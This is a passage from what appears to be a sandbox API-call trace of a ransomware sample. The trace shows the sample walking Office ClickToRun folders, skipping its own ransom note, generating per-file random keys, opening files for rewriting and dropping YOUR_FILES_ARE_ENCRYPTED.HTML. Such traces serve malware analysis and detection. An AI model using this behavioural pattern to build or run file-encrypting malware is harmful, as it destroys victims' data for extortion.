ftLastAccessTime.dwLowDateTime=0x1b5f5640, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b5f5640, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x6337d0, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0104.755] StrStrIW (lpFirst="en-us.16", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.755] wnsprintfW (in: pszDest=0x693368, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16") returned 85 [0104.755] GetProcessHeap () returned 0x600000 [0104.755] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6a4378 [0104.756] lstrcpyW (in: lpString1=0x6a4378, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16" [0104.756] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*" [0104.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f5640, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b5f5640, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0104.756] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f5640, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b5f5640, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="..", cAlternateFileName="")) returned 1 [0104.756] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f0737, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f0737, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x22d02900, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5765, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="MasterDescriptor.en-us.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0104.756] StrStrIW (lpFirst="MasterDescriptor.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.756] wnsprintfW (in: pszDest=0x6a4378, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml") returned 112 [0104.756] PathFindExtensionW (pszPath="MasterDescriptor.en-us.xml") returned=".xml" [0104.757] lstrlenW (lpString=".xml") returned 4 [0104.757] PathFindExtensionW (pszPath="MasterDescriptor.en-us.xml") returned=".xml" [0104.757] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0104.757] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0104.757] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=22373) returned 1 [0104.757] GetProcessHeap () returned 0x600000 [0104.757] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b5388 [0104.764] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="23") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="5C") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="C2") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="59") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="93") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="F0") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="00") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="E9") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="92") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="31") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="46") returned 2 [0104.765] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="36") returned 2 [0104.765] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="C7") returned 2 [0104.765] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="3D") returned 2 [0104.765] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="2F") returned 2 [0104.765] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="41") returned 2 [0104.765] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="D2") returned 2 [0104.765] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="0D") returned 2 [0104.765] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="3D") returned 2 [0104.765] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="A3") returned 2 [0104.765] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="EA") returned 2 [0104.765] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="BD") returned 2 [0104.765] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="72") returned 2 [0104.765] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="39") returned 2 [0104.765] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="5D") returned 2 [0104.765] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="14") returned 2 [0104.765] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="53") returned 2 [0104.765] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="BB") returned 2 [0104.765] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="C1") returned 2 [0104.765] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="1F") returned 2 [0104.765] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="9E") returned 2 [0104.765] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="41") returned 2 [0104.766] lstrcpyW (in: lpString1=0x6c543c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml" [0104.766] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x6b5388, NumberOfConcurrentThreads=0x0) returned 0x274 [0104.766] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b5388, lpOverlapped=0x6b5388) returned 1 [0104.766] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f1a63, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f1a63, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1 [0104.766] StrStrIW (lpFirst="s321033.hash", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.766] wnsprintfW (in: pszDest=0x6a4378, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\s321033.hash") returned 98 [0104.766] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0104.766] lstrlenW (lpString=".hash") returned 5 [0104.766] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0104.766] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f2f99, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f2f99, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x21ebc700, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0104.766] StrStrIW (lpFirst="stream.x86.en-us.man.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.766] wnsprintfW (in: pszDest=0x6a4378, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat") returned 110 [0104.766] PathFindExtensionW (pszPath="stream.x86.en-us.man.dat") returned=".dat" [0104.766] lstrlenW (lpString=".dat") returned 4 [0104.766] PathFindExtensionW (pszPath="stream.x86.en-us.man.dat") returned=".dat" [0104.766] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0104.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0104.767] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=885204) returned 1 [0104.767] GetProcessHeap () returned 0x600000 [0104.767] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0104.770] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="B5") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="2A") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="6C") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="C8") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="FB") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="75") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="87") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="F4") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="44") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="C4") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="7D") returned 2 [0104.770] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="F3") returned 2 [0104.770] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="B4") returned 2 [0104.770] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="94") returned 2 [0104.770] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="EA") returned 2 [0104.770] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="27") returned 2 [0104.770] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="3D") returned 2 [0104.770] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="8C") returned 2 [0104.770] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="B9") returned 2 [0104.770] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="6D") returned 2 [0104.770] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="93") returned 2 [0104.770] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="2F") returned 2 [0104.770] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="57") returned 2 [0104.770] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="14") returned 2 [0104.770] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="F8") returned 2 [0104.770] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="9D") returned 2 [0104.770] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="EF") returned 2 [0104.770] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="F1") returned 2 [0104.770] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="25") returned 2 [0104.770] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="00") returned 2 [0104.770] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="AF") returned 2 [0104.770] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="29") returned 2 [0104.771] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat" [0104.771] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0104.771] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0104.771] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f2f99, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f2f99, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x21ebc700, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0104.771] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0104.771] wnsprintfW (in: pszDest=0x6a4378, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0104.771] GetProcessHeap () returned 0x600000 [0104.771] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6dd4e0 [0104.771] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0104.773] WriteFile (in: hFile=0x30c, lpBuffer=0x6dd4e0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6dd4e0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0104.774] CloseHandle (hObject=0x30c) returned 1 [0104.774] GetProcessHeap () returned 0x600000 [0104.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0104.774] GetProcessHeap () returned 0x600000 [0104.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a4378 | out: hHeap=0x600000) returned 1 [0104.775] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x6337d0, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0104.775] StrStrIW (lpFirst="x-none.16", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.775] wnsprintfW (in: pszDest=0x693368, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16") returned 86 [0104.775] GetProcessHeap () returned 0x600000 [0104.775] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6a4378 [0104.776] lstrcpyW (in: lpString1=0x6a4378, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16" [0104.776] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*" [0104.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0104.776] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="..", cAlternateFileName="")) returned 1 [0104.776] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x206dcf00, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5220, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="MasterDescriptor.x-none.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0104.776] StrStrIW (lpFirst="MasterDescriptor.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.776] wnsprintfW (in: pszDest=0x6a4378, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml") returned 114 [0104.776] PathFindExtensionW (pszPath="MasterDescriptor.x-none.xml") returned=".xml" [0104.776] lstrlenW (lpString=".xml") returned 4 [0104.776] PathFindExtensionW (pszPath="MasterDescriptor.x-none.xml") returned=".xml" [0104.776] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0104.776] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0104.777] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=21024) returned 1 [0104.777] GetProcessHeap () returned 0x600000 [0104.777] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0104.779] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="DC") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="FF") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="3D") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="82") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="D1") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="B1") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="ED") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="9B") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="A7") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="8E") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="08") returned 2 [0104.779] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="C4") returned 2 [0104.779] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="29") returned 2 [0104.779] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="2C") returned 2 [0104.779] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="AF") returned 2 [0104.779] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="F1") returned 2 [0104.779] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="E4") returned 2 [0104.779] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="55") returned 2 [0104.779] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="C7") returned 2 [0104.779] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="F5") returned 2 [0104.780] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="88") returned 2 [0104.780] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="D7") returned 2 [0104.780] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="12") returned 2 [0104.780] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="BC") returned 2 [0104.780] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="DF") returned 2 [0104.780] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="C0") returned 2 [0104.780] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="10") returned 2 [0104.780] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="AD") returned 2 [0104.780] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="FE") returned 2 [0104.780] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="95") returned 2 [0104.780] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="30") returned 2 [0104.780] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="0D") returned 2 [0104.826] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml" [0104.826] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0104.826] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0104.831] FindNextFileW (in: hFindFile=0x6265b8, 